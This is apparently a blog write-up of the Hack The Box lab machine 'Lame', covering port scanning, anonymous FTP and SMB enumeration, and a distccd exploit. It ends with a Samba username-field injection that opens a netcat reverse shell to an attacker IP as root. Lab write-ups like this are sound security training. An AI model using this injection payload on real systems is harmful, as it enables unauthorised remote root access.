This is the first machine of the Hack The Box Beginner Track: “LAME”.
The box is tagged “injection”, “CMS exploit”, “Linux”, “Web”, “PHP” and “Password Reuse”.
sudo nmap -sC -sV <IP> and find four open ports: 21, 22, 139 and 445.The FTP server on port 21 allows anonymous login, so let’s try that first to catch the low-hanging fruits. Meanwhile we can run a nmap full port scan (
-p), which returns a fifth open port on 3632 (distccd v1).
The FTP server seems to not include any files, and it is also not possible to upload files from our side (error
553 Could not create file.).
Next, let’s enumerate the SMB client, which allows anonymous login as well.
We see a share “tmp” which might be accessible. We can view the share’s files with
From the folder we can download two files:
.X0-lock. The rest is not accessible with our anonymous account. We try the same with the
opt-share, but this one does not let us in anonymously.
The two files show some log data of “VGAuthService” and the X0-lock file contains a single number: 5703.
I’m not sure how to use these ones, so let’s check out the last open port with the “distccd”-service.
After downloading and running the Github exploit, I received a shell (note that it needs to be run with python2 and not python3). We end up as user
daemon and in the
/tmp directory to which we already had access via smbclient.
On the machine, we find four users in the home directory: ftp, makis, service and user. In the “makis”-directory, we find a user flag.
daemon user has a shell, I tried to create SSH keys, but unfortunately the user’s home directory ("/usr/sbin:/bin/sh") is not writable. But we can put files via the tmp-smbclient. So let’s add the linpeas-script and run it for enumeration.
After I finished the box, I watched a youtube walkthrough and learned that there was an even simpler way to get directly root access: We can get RCE directly via the SMB server without any steps in between.
The bug inside the SMB version is that we can inject arbitrary commands into the username field while we are attempting an SMB connection. This is all we need to type:
logon "./=`nohup nc -e /bin/sh 10.10.16.28 4444`". With this, we get root access.